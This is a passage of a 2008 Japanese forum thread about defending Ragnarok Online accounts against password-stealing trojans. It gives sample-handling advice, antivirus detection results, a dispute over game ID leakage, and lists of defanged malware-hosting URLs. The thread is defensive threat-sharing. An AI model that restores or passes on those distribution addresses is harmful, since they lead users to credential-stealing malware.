入ったコメントが書き込まれています。まとめサイトの危険サイトアドレスに該当しそうな
アドレスはなく、ソースチェッカーオンラインでもわからず対応に困っています。

危険なファイルであればmixiの事務局へ通報しようかと思っているのですが、こういう場合は
どうやってファイルの安全性を調べればよいのでしょうか？
すみませんがよろしくお願いいたします。

56 ：（○口○*）さん sage ： 2008/03/21(金) 11:33 ID:eYMob/gs0

>55
自分が調べる場合は
・ソースチェッカーでそのアドレスがZIP直かどうかのチェック
・安全な環境(出来れば非Windows環境)で該当ファイルをDL
・それをVirusTotalに投げて結果を見る
ってやってる。

Win環境でやる場合はブラウザからDLではなく、wget等で誤操作が起き難いように
注意してDL。

既知のウィルスで、アンチウィルスソフトのリアルタイム検索が走ってるなら
その時点で反応する場合もある。
でも反応がないからといって無害とは限らないので注意。
罷り間違ってもファイルを開くなどの操作はしないように。

調査するつもりが発動させてしまったなんて事故は割と良く起きるので、細心の
注意を払ってやる事。


注意してたのについうっかり実行してしまった、なんてお馬鹿な真似をやらかして
顔面蒼白というか涙目になるのは、自分だけでいい orz

57 ：（○口○*）さん sage ： 2008/03/21(金) 11:54 ID:3p61E8Wm0

>>55
ROではハックがあること、危険なアドレスの可能性もあることを付記して
mixiに通報してしまえば良いんじゃないだろうか？
あとは、その書き込み相手は、アクセス禁止設定する（詳細はmixiにあるのでそちら参照願います）

58 ：55 sage ： 2008/03/21(金) 12:04 ID:NL0iOyoW0

素人でどうこうできるものではなさそうですね･･･
大人しく>>57さんのアドバイスどおりにしたいと思います。ありがとうございました。

59 ：（○口○*）さん sage ： 2008/03/21(金) 12:20 ID:ls33Z00D0

ついでに、そのアドレスをここに（アドレスのピリオドを■に置き換えて）投稿して欲しい。
誤クリックしそうなら、やめといてもいいけど。

60 ：55 sage ： 2008/03/21(金) 14:11 ID:NL0iOyoW0

>>59さん
はい･･･

http://ly■qhboy■com/ragnarokonline/VID-da-g-dt-w-r-12-vg-130x100-vt-flash/mms22687ba■wmv■zip

でした。

61 ：（○口○*）さん sage ： 2008/03/21(金) 14:53 ID:ls33Z00D0

>>60
thx

カスペさんすりぬけてるので、検体提出行ってきます。

mms22687ba.wmv.zip :
HIDDENEXT/Worm.Gen(AntiVir)
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
PWS:Win32/Magania.gen(Microsoft)
Virus.HIDDENEXT/Worm.Gen(Webwasher-Gateway)

mms22687ba.wmv.exe :
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
PWS:Win32/Magania.gen(Microsoft)

62 ：（○口○*）さん sage ： 2008/03/21(金) 15:30 ID:XSsjgazG0

43,008バイトでDr.WEBとMicrosoftが捕獲というと
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/528
ttp://www.virustotal.com/analisis/ac9b75b1bfca82b29a5801da2ff0aa36
と同じ系統だね。

63 ：（○口○*）さん sage ： 2008/03/21(金) 16:59 ID:ls33Z00D0

検出名称同じだしね。

カスペ：次の更新で対応
mms22687ba.wmv.exe_ - Trojan.Win32.Inject.aix

64 ：（○口○*）さん sage ： 2008/03/22(土) 00:52 ID:e8pF72D10

明日警察行くことになったらから帰ってきたらレポしますね(´；ω；`)

65 ：（○口○*）さん sage ： 2008/03/22(土) 02:13 ID:2MZCYhKy0

あのー・・・happy.nuってドメインって危険なんですかね？
貧スレの下のほうにあるリンクに接続したら真っ白なままなんですが

なんかやばいサイトにぶち当たったかな？
一応カスペ先生でPCチェックしても今のところは異常ないんだが。

http://ragwalk■happy■nu/blog/

66 ：（○口○*）さん sage ： 2008/03/22(土) 02:29 ID:UmL3MAwQ0

>>65
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

そこは、Wiki管理人さんのとこですよ。

iframe飛ばしも、変なスクリプトもないですし。真っ白なのは他に原因があるんじゃないですかね。
DNS参照してIPに変換して、whoisで調べ、某国でないことも書いとくと安心かな？

「ragwalk.happy.nu」のIPアドレスへの変換結果→「221.186.251.72」
「221.186.251.72」のドメイン名への変換結果→「s67.xrea.com」
−−−−−
アクセサリからコマンドプロンプト開いて、nslookup ragwalk.happy.nu と入力するとIP出てきますから、試してみてね。

67 ：（○口○*）さん sage ： 2008/03/22(土) 02:33 ID:UmL3MAwQ0

リネージュ資料室の更新情報から拾ったもの。

ttp://www■dyparagon■co■kr/gon/gmsex■exe
ttp://www■symphones■com/wikipedia/
ttp://www■symphones■com/wikipedia/index1■htm
ttp://www■symphones■com/wikipedia/rmtjp■exe
ttp://www■qsuj■com/win■exe

gmsex.exe : Backdoor.Win32.Delf.hds(Kaspersky)
index.htm : HTML/IFrame(Authentium/F-Prot/F-Secure),HTML.Iframe-12(ClamAV)
index1.htm : Trojan-Downloader.VBS.Agent.kv(Kaspersky),JS/Dldr.Noopt.1969(AntiVir)
rmtjp.exe : Trojan.Win32.Inject.agj(Kaspersky),Trojan.Inject.796(DrWeb)
win.exe : TR/PSW.Stealer.73728.2(AntiVir),Suspicious:W32/Malware!Gemini(F-Secure)

win.exe は、カスペすりぬけ。「Trojan-Spy.Win32.Agent.but」として、次回更新で対応。

68 ：（○口○*）さん sage ： 2008/03/22(土) 02:47 ID:2MZCYhKy0

>>66
すばやい返事ありがとうございます

管理人さんところでしたか

66の記事を見た後接続したら、かなり表示が遅かったですが
中身見れました。

どうもお騒がせ致しました

69 ：（○口○*）さん sage ： 2008/03/22(土) 02:55 ID:UmL3MAwQ0

トレンドマイクロのWeb改竄、ウイルス感染の恐れは6ページのみ
http://internet.watch.impress.co.jp/cda/news/2008/03/21/18898.html

70 ：（○口○*）さん sage ： 2008/03/22(土) 04:49 ID:IFhPZTqz0

668 名前：どう見ても餃子です[] 投稿日：2008/03/21(金) 22:36:03 HOST:hades.sense.jp
関係ないけど、垢ハックされたくなかったら
ギルドを転々としてるやつが居るギルドには入んないほうが良いよ。

同じギルドだとアトラクションIDがバレバレになってるから注意。
出入りの激しいギルドに居る場合はパスワードはこまめに変えたほうがいい



こんな書き込みあったんだけどアトラクションIDってゲーム内でばれるものなんでしょうか？？？

71 ：（○口○*）さん sage ： 2008/03/22(土) 05:47 ID:3nzrbRyw0

知られてないが、ある条件を満たすとゲーム内でアトラクションIDが漏れることがある。
条件の1つが同一ギルドであること。

当然、本人がばらすとかそういうのではない。

72 ：（○口○*）さん sage ： 2008/03/22(土) 08:06 ID:UmL3MAwQ0

>>70
>こんな書き込みあったんだけどアトラクションIDってゲーム内でばれるものなんでしょうか？？？

ばれません。

アトラクションIDと1:1対応している（キャラ作成時に自動で割り振られる）アカウントIDならゲーム内で流れており
きゃらくえなどの情報収集をしているツールで抜き取ることができるが、その数字とアトラクションIDを結びつけるためには
ログインサーバーのDBをクラッキングして盗み出さなければならない。

パスワードに関連する情報はゲーム内では一切流れていないため盗み出すことができません。

他にも、アカハック品を並べている露店や、BOTの露店を見るだけで情報が盗み出されるというでまかせを
ゲーム内で言っている人がいますが、あれも嘘っぱちです。盗むことのできる情報は流れてきません。

ゲーム内でIDとパスを盗み出すことができるのであれば、アカハックトロイなんか必要としないんですよ。

>>71
嘘情報を流すのは感心しないな。このスレでは、事実無根の情報は排除すべきものです。

73 ：（○口○*）さん sage ： 2008/03/22(土) 09:19 ID:3nzrbRyw0

>>72
嘘を言ってるのはお前だ。

74 ：（○口○*）さん sage ： 2008/03/22(土) 09:26 ID:YrdFiajn0

「ある条件」とか春っぽいこと言ってないで詳しく書いたら？

公になれば対策に動いてくれるだろうし
思わせぶりに一部だけが知ってるような書かれ方の方がよっぽど不安や危険があるんじゃない？

75 ：（○口○*）さん sage ： 2008/03/22(土) 12:52 ID:KKCxjTmg0

今現在罠が撤去されていない＆晒しになるので具体的なURIは避けるが
ブログをハックしてのiframeタグ注入、scriptタグも併用している模様。
注意されたし。

76 ：（○口○*）さん sage ： 2008/03/22(土) 16:02 ID:IFhPZTqz0

>>72　ありがとう　キャラIDならともかくアトラクションIDとかってゲーム内関係ないよなって
思ったんだが自分知識がなくてちょっと困ってた

>>75　そのブログ運営に通報して　「ハッキングされたかもしれない」といっておけば
一次ブログ凍結、調査本人確認で対処してくれると思う
運営によっては放置なところも多いけどそのまま放置しておくよりは全然いい

ハッキングさたのを装って　他のブログからいろいろ丸パクで偽罠ブログ作るやつもいるからな
ｿﾚは本当にハッキングされたブログなのか？
アドレス出さないんじゃ注意しようもないと思うんだけど
ハッキングされたんだとしたらそのブログの通常読者は普通に訪問しちゃうわけだろ？
せめてiframeの飛ばし先でも晒して検体に出てるものかどうかデモチェックしてみたらどうだ？

77 ：（○口○*）さん sage ： 2008/03/22(土) 16:24 ID:KKCxjTmg0

業者ブログではない。
先方へのコメントは既にしたし、今見たらパスワード認証になっている。
一時的に閉鎖してチェックしているのか恒久的な閉鎖なのかは知らん。
飛ばし先は既出のhellh■net、スクリプト解読してVTに投げ検体も各社に提出済み。
iframeだけじゃなくてscriptも使われている、というブログ管理者への注意喚起。
他のコミュニティにも注意喚起してある。これでご満足いただけましたかね?

78 ：（○口○*）さん sage ： 2008/03/22(土) 17:04 ID:TmdSs/By0

最初から検体提出済みのものが仕込まれた一般ブログがあるって書けばいいのに

79 ：（○口○*）さん sage ： 2008/03/22(土) 19:44 ID:kzb1gLs00

>>73
>>71のような書き方をすれば妄想乙で済まされるのが人の世の常なのでkwsk

80 ：（○口○*）さん sage ： 2008/03/22(土) 19:49 ID:IFhPZTqz0

>>77　詳細ありがとう
最初からそうかいてくれたら突っ込みレスしないでいいのにｗ

>>73　できればkwskだけど
公開しなくてもいいから公式に通報よろｗ

81 ：（○口○*）さん sage ： 2008/03/22(土) 20:31 ID:3nzrbRyw0

詳しく書いたらリアルBAN、癌に通報すればROでBANされそうだからな。
だからβ2のギルド実装時からずっと放置されてるんだろう。

IPAの脆弱性通報フォームとかに報告したら国が動いてくれるんかな？

82 ：（○口○*）さん sage ： 2008/03/22(土) 20:53 ID:TmdSs/By0

知ってて黙ったまま被害が増えるのも消極的幇助だと思うけどね
前にPTくずすやつもRO内で広まってから対策されたんだし、
IDだけバレてもパスがわからなきゃハックはできないんだし、
パスごと抜けるんなら尚の事、ステアドからでもいいからガンホーに送りつけて欲しい

83 ：（○口○*）さん sage ： 2008/03/22(土) 20:58 ID:8A3jFT2l0

>>81
そういうことは普通にガンホーに通報すべき。〜BANとか禿げしく考え過ぎ。
それでROをBANされたらある意味いいネタだし、止めるいい機会だとも思える。
リアルBANがどういう意味で使っているか知らないけど、法律や判例くらいは目を
通してみるといいかもね、気になるなら。
ま、通報してガンホーが動くかは別問題だが(現実にそういう問題が有ったとして、
開発はあの技術力の重力だからねぇ…)。

そしてこの程度じゃIPAは動かないし、脆弱性があったとしてもIPAは何もしてくれない。
あそこは起こっている事象を観察している所だから。アラート位は出してくれるが。

世の中には表と裏はあるけど、妄想に浸るほどの深い裏はないもんだよ。

84 ：（○口○*）さん sage ： 2008/03/22(土) 22:03 ID:IFhPZTqz0

もしかしてキャラIDとアトラクションIDとガンホーIDとかの区別ついてないひとだったり

85 ：（○口○*）さん sage ： 2008/03/22(土) 23:01 ID:UmL3MAwQ0

>>84
その可能性が高いけれど、ゲーム内で扱われているアカウントIDの話とも食い違う辺りが不思議。
ID:3nzrbRyw0 さんの発言内容は、既知のパケット内容と矛盾している。

ガンホーID：アトラクションセンターへの接続などに利用。このID配下に各種アトラクションIDが関連付けられる。
　　　　　　　　ゲーム内では一切流れない。
アトラクションID：なんたらROという、ログインで入力するためのID。ゲーム内では一切流れない。

アカウントID：キャラクター作成時期に従って連番で割り振られる。若い方の数字はMOBやホム、NPCのIDで利用される。
　　　　　　　　　ゲーム内で流れているものは基本的にこのID。きゃらくえなどで表示（ゲーム内で抜かれる）のはこのID。
　　　　　　　　　アトラクションIDと1:1対応するが、逆引きができないので、このIDからアトラクションIDを知ることは不可能。
キャラクターID：キャラクター固有のID。カートの管理とか、銘入り武器POTなどの名前参照に利用されている。
　　　　　　　　　　このIDで処理すればいいのに、何故かゲーム内で普通に流れるのはアカウントID。
　　　　　　　　　　このIDは取り引き要請の際に届く。露店や所持品で銘入りのものを見た時にも、該当銘のIDが流れてくる。
　　　　　　　　　　このIDはどのアカウントIDの何スロット目に何回目に作成したキャラであるという情報まで含んでいると
　　　　　　　　　　聞いている。変換式も前に聞いたが忘れた。某価格調査サイトで銘検索が可能なのは、露店で銘入り武器を
　　　　　　　　　　見た時に届くこのIDからアカウントIDを逆引きし、DBから拾っている為。（そのためゲーム内では名無しなのに
　　　　　　　　　　某価格調査サイトで、消えている筈のキャラの銘が表示されたりするのはそのせい）

もしかして、ID:3nzrbRyw0 さんは、ギルド情報のメンバー一覧を表示させたときに届くキャラクターIDのことを
アトラクションIDと誤認してるだけなんじゃないだろうか。ログインに必要な情報とは結びつきませんよ。

86 ：（○口○*）さん age ： 2008/03/23(日) 00:23 ID:bSmpyOjV0

不正対策が更新とか表示してクライアント落ちたのはいいけど
パス無しでログインできるようになって・・・なんかヤバくね

87 ：（○口○*）さん sage ： 2008/03/23(日) 00:25 ID:3L+x1vvV0

>>86
仕様です。問題ありません。

あと、あの不正対策というのは、思いっきり嘘メッセージなので(ry

88 ：（○口○*）さん sage ： 2008/03/23(日) 00:37 ID:bSmpyOjV0

だ、だまされたぜ
さんくす

89 ：（○口○*）さん sage ： 2008/03/23(日) 02:37 ID:6Eolj0xs0

>>85
思いっきり間違ってる場所ばっかなんでつっこませてもらう。

> ゲーム内では一切流れない。

これが違うってのがそもそもの話。

> キャラクター作成時期に従って連番で割り振られる

キャラとは一切関係ない。
アカウント作成順に連番が割り振られる。

> このIDはどのアカウントIDの何スロット目に何回目に作成したキャラであるという情報まで含んでいる

こちらはキャラクター作成順に連番。

> 某価格調査サイト

上の前提が間違ってるから当然これも間違い。

90 ：（○口○*）さん sage ： 2008/03/23(日) 03:43 ID:yk76YM7m0

>>89
揚足取りの所悪いんだが、別に>>85の言ってる事の大筋は間違ってないぞ
あと、間違いっていうなら正しい解答も載せないと煽りにしかならないとおもうぜ

> ゲーム内では一切流れない。
これが違うってのがそもそもの話。

こういう部分、どう違うのかｋｗｓｋ

91 ：（○口○*）さん sage ： 2008/03/23(日) 03:49 ID:6Eolj0xs0

正しい答え書いてあるだろ？

92 ：（○口○*）さん sage ： 2008/03/23(日) 04:17 ID:wY6x4vAg0

答えを知ってるんだったら>>83が言ってる通り
ガンホーに通報するべき
過去に悪用したことがないのなら、堂々と修正を迫るべきだ
それが出来ずにここで件の事象を知らない我々を煙に巻いても何にもならないぞ

93 ：（○口○*）さん sage ： 2008/03/23(日) 04:32 ID:tlsLS2Os0

実害が出るとしても言うべき
過去の例からも広まって実害が出ないと癌は対応しない
それでも言わず通報せずってんなら釣り

94 ：（○口○*）さん sage ： 2008/03/23(日) 06:44 ID:3L+x1vvV0

>>89
>> キャラクター作成時期に従って連番で割り振られる
>アカウント作成順に連番が割り振られる。

あ、ごめん。そこんとこだけ誤記入。アカウント作成時期が正しい。

だが、趣旨は「アトラクションIDはゲーム内では一切流れない」。既知のID類も>>71の主張とは異なる。ということ

95 ：（○口○*）さん ： 2008/03/23(日) 08:21 ID:qaXj137C0

>>75-77
それFF11のブログじゃね？
アクセス1000以上/dayの大手ブログばかり狙われてるから
あっちじゃそれなりに騒ぎになっているようだね。

96 ：（○口○*）さん sage ： 2008/03/23(日) 10:21 ID:qdEGfoPr0

1日だけのネタ逃げ書き込みと思ったら今日もいるのか、春休みで暇なんですかね？

97 ：（○口○*）さん sage ： 2008/03/23(日) 11:43 ID:xBwZirke0

>>95
リネ2のパス抜きが入っていたりする

98 ：（○口○*）さん sage ： 2008/03/23(日) 13:11 ID:uB98t7uQ0

スレぶった切りだが、日記で貧スレWikiの人かなりイラついてた。
まぁ有料契約をしてるサーバーが不安定状態の上自分が管理し
てる場所を危険アドレス？とか言われたらな。気持ちはわからなくはない

実はWikiが多く設置されているXREAは最近不安定なこと多い
ここで話題にならなかったのはWikiが設置されているサーバーの鯖が
表立って問題がおきてなかったことが大きいと思う
まぁ、雷鳥Wikiの500サーバーエラーも関係してる可能性はある
ただ同じサーバーのROデータテンプレは正常稼動していたから
如何なのかは言いづらいが、XREAからの公式発表が無いからなぁ

>>65のアドが真っ白なのは確実に
s67サーバーが現在進行形で挙動おかしいからと思われる。
俺も実際日記読んでると白紙ページに当たるよ

99 ：（○口○*）さん sage ： 2008/03/23(日) 15:18 ID:bAjvYCCS0

なんかどっかで見た気もするが、どうやっても検索できないので質問。

カスペ7(6もだった気がする)使ってると毎日0時に一瞬重くなって、RO窓も
フリーズしたみたいになる。
でも1日1回時間指定ならまだ予測できるしいいやと思っていたんだけど、
MP1からはこの現象が0時じゃなくて不定期に起こるように変わったみたい。
(それこそ場合によっては1時間に1回以上とか)
ゲーム中に不意にフリーズもどきになるのがかなり悩ましいんだけど、
これってセルフディフェンス関連だっけ？

とりあえず2PCで両方とも起こるから俺だけじゃないとは思うんだけど、
原因でも軽減策でも何でもいいので、何か知っている人いない？

100 ：（○口○*）さん sage ： 2008/03/23(日) 15:52 ID:4P3UfO9w0

Updateが無いかどうか0時に確認しに行くだけ。
あれ、非常に鬱陶しいな。

101 ：（○口○*）さん sage ： 2008/03/23(日) 16:22 ID:gNr0BMcR0

しかも、更新を手動にしててもなるし…

102 ：（○口○*）さん sage ： 2008/03/23(日) 16:51 ID:bAjvYCCS0

ありがとう。言われてみればUpdateだった気がする。すっきりした。

毎日0時は仕方がないとしても、日中に起こるのはもしかしたら手動にすれば
軽減されるかもしれないので、試してみるよ。サンクス。

103 ：（○口○*）さん sage ： 2008/03/24(月) 02:29 ID:Y9Es2Z/E0

リネージュ資料室の更新情報より。全て各社に検体提出済。

ttp://www■caremoon■net/wiki/main■htm
ttp://www■panslog■net/wiki/index1■htm
ttp://www■ragnwiki■com/read/index1■htm
ttp://www■ragnwiki■com/read/server■exe
ttp://www■shagigi■net/navi/index1■htm
ttp://www■shagigi■net/navi/admin■exe
ttp://www■soracger■com/wiki/admin■exe
ttp://www■teamerblog■com/wiki/cer■exe
ttp://www■wacacop■net/wiki/index1■htm
ttp://www■wacacop■net/wiki/sever■exe
ttp://www■xinluoqu■com/ied/index1■htm
ttp://www■xinluoqu■com/ied/ser■exe

*** Kaspersky ***
admin(1).exe : Trojan.Win32.Inject.ajz
admin.exe : Trojan.Win32.Inject.ajw
cer.exe : Trojan-PSW.Win32.OnLineGames.vxq,Trojan.Win32.Inject.aka
cer\f1.exe : Trojan-PSW.Win32.OnLineGames.vxq
cer\seakinfo.exe : Trojan.Win32.Inject.aka
index1(1).htm : Trojan-Downloader.VBS.Psyme.nm
index1(3).htm : Trojan-Downloader.VBS.Psyme.nm
index1(4).htm : Trojan-Downloader.VBS.Psyme.nm
index1(5).htm : Trojan-Downloader.JS.Agent.bnd
index1.htm : Trojan-Downloader.VBS.Psyme.nm
main.htm : Trojan-Downloader.VBS.Psyme.nm
ser.exe : Trojan.Win32.Inject.aja
sever.exe : Trojan.Win32.Inject.ajy

*** Kasperskyすりぬけ ***
server.exe : Trojan.Inject.796(Dr.Web),Suspicious File(eSafe),PWS:Win32/Magania.gen(Microsoft)

104 ：（○口○*）さん sage ： 2008/03/24(月) 02:35 ID:Y9Es2Z/E0

提出作業してる間に、カスペのパターンが更新されてたようだ。今、再スキャンしたら検知した。
という訳でカスペは全部撃墜になりましたと。

server.exe : Trojan.Win32.Inject.akm

105 ：（○口○*）さん sage ： 2008/03/24(月) 07:24 ID:/HyacwI80

昨日製造
world0fwarcraft■net/lese.exe
766598■com/lese.exe (上と同じ)
www■qsuj■com/win.exe

今日製造
www■infosueek■com/xin/ff11.exe
www■play0nlink■com/ma/ff11.exe
www■jbbslivedoor■com/ff11.exe

というかこの手のはあっちでもいいんじゃないか?

106 ：（○口○*）さん sage ： 2008/03/24(月) 11:36 ID:Y9Es2Z/E0

>>105
んー、具体的事例というには弱いかなと。ROのアカハック用じゃない場合もあっちでいいのかは疑問だし。
でも、情報集積（呼び出し手順だの）には必要な情報だから、総合スレでもいいという気持ちもある。

RO板で削除依頼の出ていた投稿について、総合スレに転記しといた（削除依頼スレにもその旨投稿）ものが
運営側でセキュスレに書かれたこともあるので、こっちの方がいいのかなとか。

RO内でアカハックに遭ったとか、RO用BBSに貼られてたものとかは、総合スレに書こうと思ってるけど
ぶっちゃけ、使い分けについて、もうちょっと話し合った方がいいんじゃないかと思う。

107 ：（○口○*）さん sage ： 2008/03/24(月) 11:42 ID:Y9Es2Z/E0

>>105
カスペは全機撃墜

Trojan-PSW.Win32.OnLineGames.fcj : ff11(1).exe//PE_Patch//UPack
Trojan-PSW.Win32.OnLineGames.fcj : ff11(2).exe//PE_Patch//UPack
Trojan-PSW.Win32.OnLineGames.fcj : ff11.exe//PE_Patch//UPack
Trojan-PSW.Win32.OnLineGames.wcw : lese(1).exe//UPX
Trojan-PSW.Win32.OnLineGames.wcw : lese.exe//UPX
Trojan-Spy.Win32.Agent.bvd : win.exe

108 ：（○口○*）さん sage ： 2008/03/24(月) 12:58 ID:vvxmB4Mz0

ROを起動したら「HPlzm12」というルートプロセス（うろ覚え）を発見したとかでカスペが叫んだ
操作を終了させたらROも終了した

このプロセス名は過去何度かタスクマネージャで見た覚えがあるが、
HPのプリンタ使ってるからその関係だと思ってた
もしかしてnProと関係ある？
それとも垢ハックウィルス…？
誤検出ならいいんだが…

109 ：（○口○*）さん sage ： 2008/03/24(月) 15:09 ID:Y9Es2Z/E0

nProとは関係ないな。カスペのログから検出銘を確認してぐぐれ。

110 ：（○口○*）さん sage ： 2008/03/24(月) 15:25 ID:vvxmB4Mz0

なるほど
ログを見るって手があったか

2008/03/24 12:50:31 プロセスを実行します C:\WINDOWS\system32\HPZipm12.exe: リスクウェア 「Hidden object」。の亜種として検知しました！

ググってみたらやっぱりHPのプリンタに関係あるっつーことが判明した
ROが終了したのは謎だが脅威はなさそうだ
お騒がせしました

111 ：（○口○*）さん sage ： 2008/03/24(月) 17:39 ID:kuFhp1KL0

>106
危険アドレス関係は全部向こうでいいと思うけど。

そもそもスレ住人では出来る範囲ってのは、次のどれか

A)ソースチェッカー等で白・黒・グレーの判断
　A-1)既知の罠アドレスかどうかの判断
　A-2)ソースをチェックして怪しい部分が無いかの判断
B)検体が拾えた場合（この時点でほぼ黒だが）
　B-1)VirusTotal等に掛けて結果で判断
　B-2)検体をメーカーに提出して、結果で判断

そしてBの段階まで進んで何かのトロイだと判明したとしても、それがRO関係かどうかは
アンチウィルスメーカーじゃないと判断つかない。

となると、ROに関係しそう・関係なさそうだから、という判断で区切るよりは、危険アドレスは
全部向こうに張った方が楽だと思う。

個人的には、向こうは危険アドレス収集(とチェック結果)スレ、こっちは今まで通りの
セキュリティ全般という形がいいんじゃないかと思ってる。

112 ：（○口○*）さん sage ： 2008/03/24(月) 18:11 ID:/HyacwI80

同意。
黒なURIはあっちでいいんじゃないかと。
仮にスキャンしてWoW用とかLineage用とかGamania用とか出ても
複数のパス抜きを併用するのがいくらでもある現状では振り分けていられない。

113 ：（○口○*）さん sage ： 2008/03/24(月) 23:31 ID:Y9Es2Z/E0

「Kaspersky Internet Security 7.0」を無料で最大90日間体験できる
「Kaspe de ROULETTE（カスペ で ルーレット）」キャンペーンを本日より開始
〜サイト上のルーレットで30日＋αの試用版をもれなく提供〜
http://www.justsystems.com/jp/news/2008f/news/j03241.html

114 ：（○口○*）さん sage ： 2008/03/25(火) 06:55 ID:cw7cbgmc0

ttp://shadow-city■blogzine.jp/net/2008/03/post_4a04■html
ニュースサイトに貼られていたリンクですが、異常に重い真っ白な画面が出てくるだけでした。
まさかとは思いますが、危険性のあるサイトでしょうか？

115 ：（○口○*）さん sage ： 2008/03/25(火) 07:40 ID:JR+J3jJW0

>>114
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

真っ白だったというだけで持ち込むのはやめれ

116 ：（○口○*）さん sage ： 2008/03/25(火) 10:09 ID:kGEbjaPP0

さて今日はゲーム鯖の接続カット予定日だが、アカハック防止効果が出てくれるといいが…

117 ：（○口○*）さん sage ： 2008/03/25(火) 10:14 ID:JR+J3jJW0

BOTの「直接」接続がブロックされるだけで、中継サーバー経由の場合は防止されないし、アカハック防止はないと思うぞ。
BOTの直接稼働ができなくなる分、中継サーバー経由や、アカハックに力を入れてくる可能性はあるけど。

118 ：（○口○*）さん sage ： 2008/03/25(火) 11:24 ID:kGEbjaPP0

国内に中継鯖建てたら建てた奴がかなりリスク無い？

119 ：（○口○*）さん sage ： 2008/03/25(火) 12:23 ID:n3S5/B8a0

奴らにとって収入＞リスクだからな、結構留学生が捕まってるだろ

120 ：（○口○*）さん sage ： 2008/03/25(火) 13:03 ID:0+b7G0a50

その場合でも、癌が警察に被害届けを出すかどうか、が焦点になるわけで。

121 ：（○口○*）さん sage ： 2008/03/25(火) 14:42 ID:gUTI9l8w0

話題ぶった切りごめんなさい。
http://www■exbloog■com/7112888/
上記のURLを踏んでしまいました。
垢ハックに対する知識が少ない為、判断しがたいのですが、垢ハックURLでしょうか；；

122 ：（○口○*）さん sage ： 2008/03/25(火) 14:44 ID:JR+J3jJW0

>>121
まずはソースチェッカーで確認するんだ

123 ：（○口○*）さん sage ： 2008/03/25(火) 14:45 ID:JR+J3jJW0

あ、ちなみに、それアカハックな

124 ：（○口○*）さん sage ： 2008/03/25(火) 15:03 ID:JR+J3jJW0

>>121
アカハックのアドレスだったので、総合スレにコメントしときました。(^^)ﾉｼ

アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/537

125 ：（○口○*）さん sage ： 2008/03/25(火) 15:52 ID:gUTI9l8w0

ぎゃー、垢ハックでしたかorz

>>122-123、>>124
ありがとうございます。お手数おかけしました；；

ＰＣの初歩的な質問になってしまうのですが、スレ内で「ＰＣリカバリ」などを
見かけるのですが、ＰＣを初期化させるって事でいいんでしょうか？

126 ：（○口○*）さん sage ： 2008/03/25(火) 17:43 ID:QUeDnFP60

>>125
YES

メーカー製PCだと「リカバリCD」とかいう感じの、これで再インストールしたら
出荷時の状態に初期化できますよというのがついてることが多い

127 ：（○口○*）さん sage ： 2008/03/25(火) 19:07 ID:Aq92ZzvG0

FFが派手にやられてるようだね。
人気ブログそのものを改竄してiframe埋め込む手法で。

128 ：（○口○*）さん sage ： 2008/03/25(火) 19:42 ID:Vdcuyq8A0

最近はscript使ってるっぽい。
これだとほとんどのブログで使える。

129 ：（○口○*）さん sage ： 2008/03/25(火) 20:01 ID:gUTI9l8w0

>>126
返答ありがとうございました。

当方少し前にPCを修理に出し初期化したばかりで、特に大切なデータも
なかったので、バックアップは取らずに初期化しました。
>>6の手順を見ると、1−4の行程をすっ飛ばした形で、ROに接続できる状態に
なったと判断して大丈夫でしょうか？

130 ：（○口○*）さん sage ： 2008/03/26(水) 05:28 ID:DGUvGzad0

>>129
乙。
今後重要なのは、1-3関連。要は再発防止策になるな。
今のうちに手間を掛けておくことで、以後再インストールが必要になったりする手間を減らせる可能性が出てくるのだから。

131 ：（○口○*）さん sage ： 2008/03/26(水) 09:25 ID:Wgd+zMzM0

皆様乙であります。>>43,44です。
昨日、相方の住所等個人情報と、相方側の相談署と担当者さんの名前を
私の担当者に連絡入れました。
ほぼ調書は出来ているそうで、目を通してサインしてもらう必要があるので
また後日連絡しますとのことでした。
調書にサインなんてあるんですねぇ。はじめて拝見するので、少し楽しみです。

132 ：（○口○*）さん sage ： 2008/03/26(水) 12:14 ID:c1/5kyG10

すいません、相談があります
青箱46個目スレで 884番目のレスに反応して踏んでしまいました(?)　
その後915番目のレスにて アカハックサイトと書かれて居るのを見ました。
このサイトは本当にアカハックサイトなのでしょうか？

【　 　 　 気付いた日時　 　 　 　 　 】 08/03/26 10:42
【不審なアドレスのクリックの有無　】 クリックしました
【　　アドレス 　 】kkuro■exblog■jp
【　 　　 OS　 　 】WindowsXP Home SP2
【使用ブラウザ 】IE6.0 sp2
【WindowsUpdateの有無】 3月13日　自動更新
【　アンチウイルスソフト 】 VB2008　アップデート最新
【その他のSecurty対策 】無
【 ウイルススキャン結果】 VB2008で検索→何も無し
　　　　　　　　　　　　　カスペオンライン→ウイルスは何も検出されませんでしたが
　　　　　　　　　　　　　結構な数のファイルが 使用中でロックされています　とでます
【テンプレの参考サイトを読んだか】 (Yes)
【hosts変更】無
【PeerGuardian2導入】無
【説明】
１・同スレのレスにて アカハックサイトとの事
２・ソースチェッカーにて インラインフレーム１ 隠しスクリプト１０
　　安全度が４８％だったので　怪しいと思いました

カスペでの検索結果の ロックされているのは無視でも大丈夫ですか？

133 ：（○口○*）さん sage ： 2008/03/26(水) 12:41 ID:9EOI6ixV0

>>132
0サイズのインラインフレームタグはあるけど

<iframe name="cmtviewfrm" id="cmtviewfrm" src="" width="0" height="0" border="0" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" style="display:block"></iframe>

具体的な飛ばし先はないっていうかこれCM表示かなんかの枠かね？
表示されないようになってるけど
exblogはiframe使えないと思ってたけどCSSのほうになら使えるのかな？

使用中でロックというのはウィルスをロックではなくて
起動していて干渉できなかったということなんじゃないかと
色々終了させて再度かけてみたら？

134 ：（○口○*）さん sage ： 2008/03/26(水) 13:26 ID:OHIAVHbi0

iframeのsrcが無いので仕掛けるの失敗したとか駆除したとか?

Firefox2.0.0.13リリース

135 ：（○口○*）さん sage ： 2008/03/26(水) 13:37 ID:90OFAAH00

exciteが勝手に埋め込むもの
用途はいまいち不明だけどCoMmenTVIEWFoRMじゃないかね

136 ：132です sage ： 2008/03/26(水) 19:03 ID:c1/5kyG10

他のExciteブログのHPをチェッカーで調べたところ
>>133 が書いているタグ（？）と同じ物が書いてありました
>>135 が言っているようにExciteが勝手に埋め込んでる物みたいです

後、ロック〜〜もソフトとかを終了させて検索したら 数が減りました
